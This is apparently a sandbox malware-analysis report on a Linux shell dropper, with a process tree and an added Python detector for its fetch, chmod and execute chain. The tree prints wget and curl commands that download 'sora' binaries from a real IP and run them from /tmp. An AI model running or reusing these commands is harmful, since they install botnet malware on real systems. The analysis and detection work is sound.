Analysis
- max time kernel: 2s
- max time network: 128s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240611-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 18/10/2024, 02:04
Static task
- static1
Behavioral tasks (sample 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh in each)
- behavioral1: resource ubuntu1804-amd64-20240611-en
- behavioral2: resource debian9-armhf-20240729-en
- behavioral3: resource debian9-mipsbe-20240611-en
- behavioral4: resource debian9-mipsel-20240729-en
General
- Target: 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
- Size: 2KB
- MD5: 5d873bf46fd4ff411eb17e42d5ae2980
- SHA1: fd73b1bb3b7241d68fcaac4f4bf9cc6164b6fa06
- SHA256: 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d
- SHA512: f58f94eaa5f9440db6b1c41915be89331d7355904631d3ede46adfd517e493b3e49979d0ad0a535d8d6181ac81e0d19d6ba0dcb33765b54bbc16830828cc6382
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTP, 14 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Process: chmod; PIDs 1489, 1495, 1505, 1511, 1517, 1523, 1529, 1535, 1541, 1547, 1553, 1559, 1565, 1571
- Executes dropped EXE (14 IoCs)
  IoC: /tmp/robben; process: robben; PIDs 1490, 1496, 1506, 1512, 1518, 1524, 1530, 1536, 1542, 1548, 1554, 1560, 1566, 1572
- System Network Configuration Discovery (1 TTP, 3 IoCs)
  Adversaries may gather information about the network configuration of a system.
  PIDs 1492 (wget), 1493 (curl), 1494 (cat)
- Writes file to tmp directory (1 IoC)
  Malware often drops required files in the /tmp directory.
  File opened for modification: /tmp/robben, by process 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Processes
The tree below is one five-step iteration repeated for 14 architecture builds (x86, mips, x86_64, i468, i686, mpsl, arm4, arm5, arm6, arm7, ppc, ppc440fp, m68k, sh4): fetch http://93.123.85.141/bins/sora.<arch> with wget and again with curl -O, cat the download, chmod +x everything in /tmp (the chmod argv is the expanded /tmp listing), then run ./robben. Every child hangs directly off the root script, PID 1485.

- PID 1485  /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh  [Writes file to tmp directory]
  - PID 1486  /usr/bin/wget: wget http://93.123.85.141/bins/sora.x86
  - PID 1487  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.x86
  - PID 1488  /bin/cat: cat sora.x86
  - PID 1489  /bin/chmod: chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1  [File and Directory Permissions Modification]
  - PID 1490  /tmp/robben: ./robben  [Payload; Executes dropped EXE]
  - PID 1492  /usr/bin/wget: wget http://93.123.85.141/bins/sora.mips  [System Network Configuration Discovery]
  - PID 1493  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.mips  [System Network Configuration Discovery]
  - PID 1494  /bin/cat: cat sora.mips  [System Network Configuration Discovery]
  - PID 1495  /bin/chmod: chmod +x (same /tmp listing as PID 1489)  [File and Directory Permissions Modification]
  - PID 1496  /tmp/robben: ./robben  [Payload; Executes dropped EXE]
  - PID 1498  /usr/bin/wget: wget http://93.123.85.141/bins/sora.x86_64
  - PID 1503  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.x86_64
  - PID 1504  /bin/cat: cat sora.x86_64
  - PID 1505  /bin/chmod: chmod +x (same /tmp listing as PID 1489)  [File and Directory Permissions Modification]
  - PID 1506  /tmp/robben: ./robben  [Payload; Executes dropped EXE]
  - PID 1508  /usr/bin/wget: wget http://93.123.85.141/bins/sora.i468
  - PID 1509  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.i468
  - PID 1510  /bin/cat: cat sora.i468
  - PID 1511  /bin/chmod: chmod +x (same /tmp listing as PID 1489)  [File and Directory Permissions Modification]
  - PID 1512  /tmp/robben: ./robben  [Payload; Executes dropped EXE]
  - PID 1514  /usr/bin/wget: wget http://93.123.85.141/bins/sora.i686
  - PID 1515  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.i686
  - PID 1516  /bin/cat: cat sora.i686
  - PID 1517  /bin/chmod: chmod +x (same /tmp listing as PID 1489)  [File and Directory Permissions Modification]
  - PID 1518  /tmp/robben: ./robben  [Payload; Executes dropped EXE]
  - PID 1520  /usr/bin/wget: wget http://93.123.85.141/bins/sora.mpsl
  - PID 1521  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.mpsl
  - PID 1522  /bin/cat: cat sora.mpsl
  - PID 1523  /bin/chmod: chmod +x (same /tmp listing as PID 1489)  [File and Directory Permissions Modification]
  - PID 1524  /tmp/robben: ./robben  [Payload; Executes dropped EXE]
  - PID 1526  /usr/bin/wget: wget http://93.123.85.141/bins/sora.arm4
  - PID 1527  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.arm4
  - PID 1528  /bin/cat: cat sora.arm4
  - PID 1529  /bin/chmod: chmod +x (same /tmp listing as PID 1489)  [File and Directory Permissions Modification]
  - PID 1530  /tmp/robben: ./robben  [Payload; Executes dropped EXE]
  - PID 1532  /usr/bin/wget: wget http://93.123.85.141/bins/sora.arm5
  - PID 1533  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.arm5
  - PID 1534  /bin/cat: cat sora.arm5
  - PID 1535  /bin/chmod: chmod +x (same /tmp listing as PID 1489)  [File and Directory Permissions Modification]
  - PID 1536  /tmp/robben: ./robben  [Payload; Executes dropped EXE]
  - PID 1538  /usr/bin/wget: wget http://93.123.85.141/bins/sora.arm6
  - PID 1539  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.arm6
  - PID 1540  /bin/cat: cat sora.arm6
  - PID 1541  /bin/chmod: chmod +x (same /tmp listing as PID 1489)  [File and Directory Permissions Modification]
  - PID 1542  /tmp/robben: ./robben  [Payload; Executes dropped EXE]
  - PID 1544  /usr/bin/wget: wget http://93.123.85.141/bins/sora.arm7
  - PID 1545  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.arm7
  - PID 1546  /bin/cat: cat sora.arm7
  - PID 1547  /bin/chmod: chmod +x (same /tmp listing as PID 1489)  [File and Directory Permissions Modification]
  - PID 1548  /tmp/robben: ./robben  [Payload; Executes dropped EXE]
  - PID 1550  /usr/bin/wget: wget http://93.123.85.141/bins/sora.ppc
  - PID 1551  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.ppc
  - PID 1552  /bin/cat: cat sora.ppc
  - PID 1553  /bin/chmod: chmod +x (same /tmp listing as PID 1489)  [File and Directory Permissions Modification]
  - PID 1554  /tmp/robben: ./robben  [Payload; Executes dropped EXE]
  - PID 1556  /usr/bin/wget: wget http://93.123.85.141/bins/sora.ppc440fp
  - PID 1557  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.ppc440fp
  - PID 1558  /bin/cat: cat sora.ppc440fp
  - PID 1559  /bin/chmod: chmod +x (same /tmp listing as PID 1489)  [File and Directory Permissions Modification]
  - PID 1560  /tmp/robben: ./robben  [Payload; Executes dropped EXE]
  - PID 1562  /usr/bin/wget: wget http://93.123.85.141/bins/sora.m68k
  - PID 1563  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.m68k
  - PID 1564  /bin/cat: cat sora.m68k
  - PID 1565  /bin/chmod: chmod +x (same /tmp listing as PID 1489)  [File and Directory Permissions Modification]
  - PID 1566  /tmp/robben: ./robben  [Payload; Executes dropped EXE]
  - PID 1568  /usr/bin/wget: wget http://93.123.85.141/bins/sora.sh4
  - PID 1569  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.sh4
  - PID 1570  /bin/cat: cat sora.sh4
  - PID 1571  /bin/chmod: chmod +x (same /tmp listing as PID 1489)  [File and Directory Permissions Modification]
  - PID 1572  /tmp/robben: ./robben  [Payload; Executes dropped EXE]
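The process tree and the signatures above are the raw material for two things a responder wants: the indicators to pivot on (download host, URL set, architecture suffixes, dropped path) and a detection for the fetch, chmod +x, execute-from-/tmp chain the script runs under one parent. The Python below is an added example written for this page; it is not the sandbox's code and not the sample. Every PID, path and URL in it is transcribed from the tree; the parent-PID column is an assumption, since the report shows only tree depth and every depth-2 process sits under the root script, PID 1485. One inference worth stating: the redirect that turns `cat sora.<arch>` into a copy is not visible in argv, but the report's "File opened for modification /tmp/robben" by the script process itself is what a shell redirect such as `cat sora.<arch> > robben` would produce, so the example treats robben as the per-iteration copy of the download.

```python
"""Added example (not from the report or the sample): reconstruct the
fetch / chmod +x / execute loop from the process tree above, extract IoCs,
and flag the chain generically for any parent whose children follow it."""
import re
from collections import defaultdict
from urllib.parse import urlparse

ROOT_PID = 1485                      # the dropper script; parent of every row below (assumed)
DROPPER = "/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh"
BASE_URL = "http://93.123.85.141/bins/sora."

# One row per loop iteration, in tree order:
# (arch suffix, wget PID, curl PID, cat PID, chmod PID, ./robben PID)
ITERATIONS = [
    ("x86",      1486, 1487, 1488, 1489, 1490),
    ("mips",     1492, 1493, 1494, 1495, 1496),
    ("x86_64",   1498, 1503, 1504, 1505, 1506),
    ("i468",     1508, 1509, 1510, 1511, 1512),
    ("i686",     1514, 1515, 1516, 1517, 1518),
    ("mpsl",     1520, 1521, 1522, 1523, 1524),
    ("arm4",     1526, 1527, 1528, 1529, 1530),
    ("arm5",     1532, 1533, 1534, 1535, 1536),
    ("arm6",     1538, 1539, 1540, 1541, 1542),
    ("arm7",     1544, 1545, 1546, 1547, 1548),
    ("ppc",      1550, 1551, 1552, 1553, 1554),
    ("ppc440fp", 1556, 1557, 1558, 1559, 1560),
    ("m68k",     1562, 1563, 1564, 1565, 1566),
    ("sh4",      1568, 1569, 1570, 1571, 1572),
]

FETCHERS = {"wget", "curl", "tftp", "ftpget"}          # common IoT-dropper fetch tools
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")   # where droppers stage payloads
URL_RE = re.compile(r"https?://[^\s'\"]+")


def build_events():
    """Flatten the transcribed tree into (pid, ppid, exe, argv) rows, oldest first.
    The real chmod argv is the whole /tmp listing ('chmod +x *'); only the two
    names that matter for the chain are kept here."""
    events = [(ROOT_PID, 1, DROPPER, [DROPPER])]
    for arch, wget, curl, cat, chmod, run in ITERATIONS:
        url = BASE_URL + arch
        events += [
            (wget,  ROOT_PID, "/usr/bin/wget", ["wget", url]),
            (curl,  ROOT_PID, "/usr/bin/curl", ["curl", "-O", url]),
            (cat,   ROOT_PID, "/bin/cat",      ["cat", "sora." + arch]),
            (chmod, ROOT_PID, "/bin/chmod",    ["chmod", "+x", DROPPER.rsplit("/", 1)[-1], "robben"]),
            (run,   ROOT_PID, "/tmp/robben",   ["./robben"]),
        ]
    return events


def detect_fetch_chmod_exec(events):
    """Flag a parent whose children, in order, fetch a URL, chmod +x something,
    then execute a file from a world-writable directory. One finding per execution;
    each hit consumes the fetch and chmod that led to it, so a lone exec after an
    old download is not re-flagged."""
    by_parent = defaultdict(list)
    for pid, ppid, exe, argv in events:
        by_parent[ppid].append((pid, exe, argv))
    findings = []
    for ppid, children in by_parent.items():
        last_fetch = last_chmod = None
        for pid, exe, argv in children:
            name = argv[0].rsplit("/", 1)[-1]
            if name in FETCHERS and any(URL_RE.search(a) for a in argv):
                last_fetch = pid
            elif name == "chmod" and "+x" in argv[1:]:
                last_chmod = pid
            elif exe.startswith(WORLD_WRITABLE) and last_fetch and last_chmod:
                findings.append({"parent": ppid, "fetch": last_fetch,
                                 "chmod": last_chmod, "exec": pid, "path": exe})
                last_fetch = last_chmod = None
    return findings


def extract_iocs(events):
    """Every URL fetched, the hosts behind them, the architecture suffixes tried
    (basename after 'sora.'), and the dropped files that were executed."""
    urls, dropped = [], []
    for _, _, exe, argv in events:
        for arg in argv:
            m = URL_RE.search(arg)
            if m and m.group(0) not in urls:
                urls.append(m.group(0))
        if exe.startswith(WORLD_WRITABLE) and exe != DROPPER and exe not in dropped:
            dropped.append(exe)
    arches = [urlparse(u).path.rsplit("/", 1)[-1].split(".", 1)[1] for u in urls]
    return {"urls": urls, "hosts": sorted({urlparse(u).hostname for u in urls}),
            "arches": arches, "dropped": dropped}


if __name__ == "__main__":
    ev = build_events()
    iocs = extract_iocs(ev)
    print("hosts:", iocs["hosts"])
    print("arches tried:", ", ".join(iocs["arches"]))
    print("dropped and executed:", iocs["dropped"])
    for f in detect_fetch_chmod_exec(ev):
        print(f"chain under PID {f['parent']}: fetch {f['fetch']} -> chmod {f['chmod']} "
              f"-> exec {f['exec']} ({f['path']})")
```

The detector keys on the parent, not on the tool names: on a real EDR feed the same logic runs over (pid, ppid, exe, argv) rows from auditd, eBPF or the sandbox's own export, and it fires once per `./robben` here, 14 times, which is also a cheap way to tell "one dropper trying every architecture" from a single legitimate download. The architecture list is the usual Mirai-family spread; the fact that the x86 build was reached first and all 14 still ran to completion in the sandbox says nothing about which one actually executed as native code, since the report does not show exit status.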